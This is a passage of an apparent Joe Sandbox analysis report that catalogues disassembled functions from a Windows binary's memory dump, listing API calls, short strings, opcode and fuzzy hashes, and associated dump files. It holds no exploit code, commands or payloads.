                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                              • String ID:
                              • API String ID: 513048808-0
                              • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                              • Instruction ID: 1dca9756e8f8f9b455c54d60a1b5b15015b9caac53f0f8f28fa142f89f77c4b2
                              • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                              • Instruction Fuzzy Hash: 2D21513190C682CBE7507F66A5C4238FAA0FF5A755F9C5134DE0E46AD8CE7CA848A720
                              Function 00007FF744F13578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F13584
                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                              • String ID:
                              • API String ID: 513048808-0
                              • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                              • Instruction ID: 140e26a0a81a26be845006019222410ba0b7a0bba6d3e7769f1cf0147624425b
                              • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                              • Instruction Fuzzy Hash: 13114F31A0CA42C7EB50BF26A5C4478EAA0FB49B65F995334DD6F427D8CE3CD845A610
                              Function 00007FF744F19584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 4104442557-0
                              • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                              • Instruction ID: c0aac1a5d9c9774d1e9bb96ac3a74788abd524ddc1d268ca31471514ad1a90e4
                              • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                              • Instruction Fuzzy Hash: 54114226A09B41CBEF00FF62E88416873A4F719758F840A34EE6D47B98DF3CD5648350
                              Function 00007FF744F2711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                              Download Yara Rule
                              APIs
                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F271F9
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F2720D
                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F27300
                                • Part of subcall function 00007FF744F25740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF744F275C4,?,?,00000000,00007FF744F26999,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F25744
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: OpenSemaphore$CloseErrorHandleLast
                              • String ID: _p0$wil
                              • API String ID: 455305043-1814513734
                              • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                              • Instruction ID: 614ba4b4d610974da8b7c18f55219536cf8e185883ac7472873659df69b94f40
                              • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                              • Instruction Fuzzy Hash: 22617F62B1DA42C6EF25BF5694901B9A3E1FF84B80F985431DE0E077D8DE3EE9049720
                              Function 00007FF744F01DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspacememset$AllocProcess
                              • String ID: %s
                              • API String ID: 2401724867-3043279178
                              • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                              • Instruction ID: 3edd747d2199c897a522bd6553674ebe464d90abb40cf5eea045486bc718f3b2
                              • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                              • Instruction Fuzzy Hash: 9451B632A0C682C9EB20BF12D8812B9B3A0FB45B95F884135DE4D476D9EF3DE551E720
                              Function 00007FF744F0E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 3849470556-1994581435
                              • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                              • Instruction ID: 71ad371b7eaf1b042f937ec726f05ad92c86e8e437788caaa9165878371b26b0
                              • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                              • Instruction Fuzzy Hash: 67515721A0C652C5F724BF57A488279BAA0FB94B54F898035DE5D433D8DF7CE840A720
                              Function 00007FF744F2992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F29A10
                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F29994
                                • Part of subcall function 00007FF744F2A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A77A
                                • Part of subcall function 00007FF744F2A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A839
                                • Part of subcall function 00007FF744F2A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A850
                              • wcsrchr.MSVCRT ref: 00007FF744F29A62
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$CloseEnumOpenwcsrchr
                              • String ID: %s=%s$.
                              • API String ID: 3242694432-4275322459
                              • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                              • Instruction ID: 9458a3f77c32027030299baf705d7ec20bb33211ee9e05745ac92dc0288a6f3b
                              • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                              • Instruction Fuzzy Hash: 87418F21B0D742D6FB20BF52A0D46B9E2A0FF857A0F984230DD5D07BD9DE7DE841A621
                              Function 00007FF744F1417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CurrentDirectorytowupper
                              • String ID: :$:
                              • API String ID: 238703822-3780739392
                              • Opcode ID: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
                              • Instruction ID: 6a1739d4197885be1fa52fd6ff8288cd383429b62c7c3149edcad05856b9d2c0
                              • Opcode Fuzzy Hash: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
                              • Instruction Fuzzy Hash: 9311225260C641C6EB25BF22A885279F6F0FF89B9AF898032DD0D077D8DE3CD401A724
                              Function 00007FF744F15EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$CurrentDirectorytowupper
                              • String ID:
                              • API String ID: 1403193329-0
                              • Opcode ID: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                              • Instruction ID: ff57a0c5e879edbc62072159cd9d456372d70bc833037fdf1f1642a3676038f4
                              • Opcode Fuzzy Hash: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                              • Instruction Fuzzy Hash: 5A518726A0D681C6EB25BF2299906B9B7B0FF44758F898135CE4E076D8DF3CD944A720
                              Function 00007FF744F091C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00007FF744F0921C
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F093AA
                                • Part of subcall function 00007FF744F08B20: wcsrchr.MSVCRT ref: 00007FF744F08BAB
                                • Part of subcall function 00007FF744F08B20: _wcsicmp.MSVCRT ref: 00007FF744F08BD4
                                • Part of subcall function 00007FF744F08B20: _wcsicmp.MSVCRT ref: 00007FF744F08BF2
                                • Part of subcall function 00007FF744F08B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F08C16
                                • Part of subcall function 00007FF744F08B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F08C2F
                                • Part of subcall function 00007FF744F08B20: wcschr.MSVCRT ref: 00007FF744F08CB3
                                • Part of subcall function 00007FF744F1417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F141AD
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,0000000A,00007FF744F092AC), ref: 00007FF744F130CA
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F130DD
                                • Part of subcall function 00007FF744F13060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F130F6
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F13106
                              • wcsrchr.MSVCRT ref: 00007FF744F092D8
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F09362
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F09373
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                              • String ID:
                              • API String ID: 3966000956-0
                              • Opcode ID: b940a3ae0cbd3b0dcc09caeba803782aba8febc90d450ee18c078e27142e0860
                              • Instruction ID: 9977b9394cfed374984784c542f1a6e826c9a196667761af652819163b531725
                              • Opcode Fuzzy Hash: b940a3ae0cbd3b0dcc09caeba803782aba8febc90d450ee18c078e27142e0860
                              • Instruction Fuzzy Hash: E1518432A0D682C5EB61BF12D4946B9A3A4FB89B44F884035DE4D07BD9EF3CE551D710
                              Function 00007FF744F2E558 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorModememset$FullNamePath_wcsicmp
                              • String ID:
                              • API String ID: 2123716050-0
                              • Opcode ID: 6424c7caf3ba124e77cb4cf79b3ec375c840d0e262fe90f70dc7f5ef3c4399ca
                              • Instruction ID: 2ee398e939208bad924701480a1b1743a8436dbe89e8b9b6acbef363bc9b7665
                              • Opcode Fuzzy Hash: 6424c7caf3ba124e77cb4cf79b3ec375c840d0e262fe90f70dc7f5ef3c4399ca
                              • Instruction Fuzzy Hash: 914192327096C1CAEB75EF22D8903E967A4FB49B88F484134DE4D4AA9CDE3CD7449710
                              Function 00007FF744F065F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                              • String ID:
                              • API String ID: 3114114779-0
                              • Opcode ID: 1d3c40c4db9270235dfbff6205660991289e4dcca270832023e59d6b38883110
                              • Instruction ID: 17151d7b19cfd643087b3c311a53cdc4a7c138a2eec95d7974445837ee1e43e0
                              • Opcode Fuzzy Hash: 1d3c40c4db9270235dfbff6205660991289e4dcca270832023e59d6b38883110
                              • Instruction Fuzzy Hash: A2413B36B09B42CAE700EF66D4842AC77A5FB88748F994135DE0D93798DF38E405D760
                              Function 00007FF744F132E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00007FF744F133A8: iswspace.MSVCRT(?,?,00000000,00007FF744F2D6EE,?,?,?,00007FF744F20632), ref: 00007FF744F133C0
                              • iswspace.MSVCRT(?,?,?,00007FF744F132A4), ref: 00007FF744F1331C
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswspace
                              • String ID: off
                              • API String ID: 2389812497-733764931
                              • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                              • Instruction ID: 43f1122cc37e7da45c333986f5950cbdab0160a929c82ae3e5e4e25694ab804e
                              • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                              • Instruction Fuzzy Hash: B4212A21E0C652C2FB60BF179495279F6B0EF45B90F8D8135DD8E866C9DE2CE840A225
                              Function 00007FF744F29308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspace$AllocProcess
                              • String ID: %s=%s$DPATH$PATH
                              • API String ID: 3731854180-3148396303
                              • Opcode ID: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                              • Instruction ID: cd170875ba26a71c1a983a22f305996eb16cbb08ed7798d60e212e5860772e30
                              • Opcode Fuzzy Hash: ed2b41c8f7c1b35c8c8099a63381124b221818ea20370dab215de2e112638c1b
                              • Instruction Fuzzy Hash: 4B213A22B0D656C2EB54BF57A48167AA6A4BF84B80FCC4135DD0E477E9DE3DE840A360
                              Function 00007FF744F18198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcscmp
                              • String ID: *.*$????????.???
                              • API String ID: 3392835482-3870530610
                              • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                              • Instruction ID: 03046f3e8b5f19afad0a2a5b343c7da1a053734361c59edfc0bcec159208d3c9
                              • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                              • Instruction Fuzzy Hash: 1A115E25B18E92C1E764BF27A580569B2A1EB44B80B9C5031DE8D57B89DE3DE841A720
                              Function 00007FF744F01130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.1447290933.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000005.00000002.1447257773.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447369137.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F41000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447424067.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000005.00000002.1447500083.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$CurrentDirectorytowupper
                              • String ID:
                              • API String ID: 1403193329-0
